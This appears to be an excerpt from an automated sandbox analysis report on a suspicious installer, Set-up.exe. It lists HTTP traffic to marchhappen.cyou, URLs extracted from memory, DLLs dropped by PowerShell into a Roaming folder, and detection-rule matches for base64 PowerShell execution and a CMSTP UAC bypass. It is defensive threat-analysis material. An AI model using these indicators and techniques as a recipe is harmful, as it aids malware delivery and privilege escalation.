                    Source: unknown, HTTP traffic detected:
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: marchhappen.cyou
                    Source: global traffic, HTTP traffic detected:
                        HTTP/1.1 403 Forbidden
                        Date: Mon, 25 Nov 2024 09:54:50 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 8771
                        Connection: close
                        Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                        Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                        Cross-Origin-Embedder-Policy: require-corp
                        Cross-Origin-Opener-Policy: same-origin
                        Cross-Origin-Resource-Policy: same-origin
                        Origin-Agent-Cluster: ?1
                        Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                        Referrer-Policy: same-origin
                        X-Content-Options: nosniff
                        X-Frame-Options: SAMEORIGIN
                        cf-mitigated: challenge
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.com/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.com/product-land-188.htmlhttp://support.reneelab.com/anonymous_requests/newstore
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.de/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.de/product-land-237.htmlhttp://support.reneelab.com/anonymous_requests/newstore/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.es/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.es/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newstore/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.fr/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.it/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.it/reimpostare-passwordi-di-windows-login.html
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.jp/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.jp/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstore/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.kr/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.net/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.net//reset-windows-password.htmlhttp://support.reneelab.com/anonymous_requests/n
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.pl/
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.pl/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newpurcha
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.reneelab.ru/
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                    Source: Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.trialpay.com/productpage/?c=3016dc6&tid=6rpipbo
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                    Source: Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.winimage.com/zLibDll1.2.6
                    Source: Set-up.exe, 00000005.00000002.2038064529.000000006F009000.00000002.00000001.01000000.0000000E.sdmp, Set-up.exe, 00000008.00000002.2170156520.000000006F009000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://xml.org/sax/features/namespace-prefixes
                    Source: Set-up.exe, 00000005.00000002.2038064529.000000006F009000.00000002.00000001.01000000.0000000E.sdmp, Set-up.exe, 00000008.00000002.2170156520.000000006F009000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://xml.org/sax/features/namespaces
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E524D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E526F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://downloads.reneelab.com.cn/download_api.php
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://downloads.reneelab.com.cn/passnow/passnow_
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://downloads.reneelab.com/download_api.php
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://downloads.reneelab.com/download_api.phphttps://downloads.reneelab.com.cn/download_api.php?ac
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://downloads.reneelab.com/passnow/passnow_
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://downloads.reneelab.com/passnow/passnow_cnhttps://downloads.reneelab.com.cn/passnow/passnow_x
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E526F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000000.00000002.1934473378.0000018E53FEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.certum.pl/CPS0
                    Source: Set-up.exe, 00000005.00000002.2015583139.00000000035E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.c
                    Source: Set-up.exe, 00000005.00000002.2015698096.0000000003706000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2099766209.0000000005043000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2118799916.0000000003ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.reneelab.com
                    Source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2114936608.0000000000864000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.reneelab.comwww.reneelab.comhttp://https://0
                    Source: unknown HTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49736 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49738 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49739 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49740 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49741 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49743 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 104.21.2.224:443 -> 192.168.2.4:49755 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 172.67.75.40:443 -> 192.168.2.4:49761 version: TLS 1.2

                    System Summary

                    Source: amsi64_1856.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: 13.2.msiexec.exe.513aacd.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 9.2.msiexec.exe.51e06cd.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 10.2.more.com.439da00.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.Set-up.exe.3a81877.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 6.2.more.com.5049a00.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.Set-up.exe.3ae5877.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 9.2.msiexec.exe.519aa00.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.Set-up.exe.3ac7544.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.Set-up.exe.3ac6944.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 5.2.Set-up.exe.3753544.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 5.2.Set-up.exe.3752944.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 6.2.more.com.508eacd.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.Set-up.exe.3b2b544.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 6.2.more.com.508f6cd.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.Set-up.exe.3b2a944.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 9.2.msiexec.exe.51dfacd.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 10.2.more.com.43e2acd.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 10.2.more.com.43e36cd.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.msiexec.exe.50f5a00.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.msiexec.exe.513b6cd.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 5.2.Set-up.exe.370d877.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 1856, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\VWPGdipf\QtXml4.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\VWPGdipf\UpdateClient.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\VWPGdipf\QtCore4.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\VWPGdipf\msvcr100.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\VWPGdipf\QtGui4.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\VWPGdipf\StarBurn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\VWPGdipf\UpdateCommon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\VWPGdipf\QtNetwork4.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\VWPGdipf\RcClientBase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\VWPGdipf\NAudio.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\VWPGdipf\Data\d3dcompiler_47.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\VWPGdipf\Data\Updater.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\VWPGdipf\Resource.ct
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\VWPGdipf\msvcp100.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\VWPGdipf\Data\ffmpeg.dll
                    Source: Resource.ct.0.dr, Static PE information: Number of sections : 14 > 10
                    Source: amsi64_1856.amsi.csv, type: OTHER, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: 13.2.msiexec.exe.513aacd.6.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 9.2.msiexec.exe.51e06cd.5.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 10.2.more.com.439da00.4.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.Set-up.exe.3a81877.6.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 6.2.more.com.5049a00.5.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 8.2.Set-up.exe.3ae5877.10.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 9.2.msiexec.exe.519aa00.6.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.Set-up.exe.3ac7544.9.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.Set-up.exe.3ac6944.7.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 5.2.Set-up.exe.3753544.7.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 5.2.Set-up.exe.3752944.10.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 6.2.more.com.508eacd.2.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 8.2.Set-up.exe.3b2b544.9.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
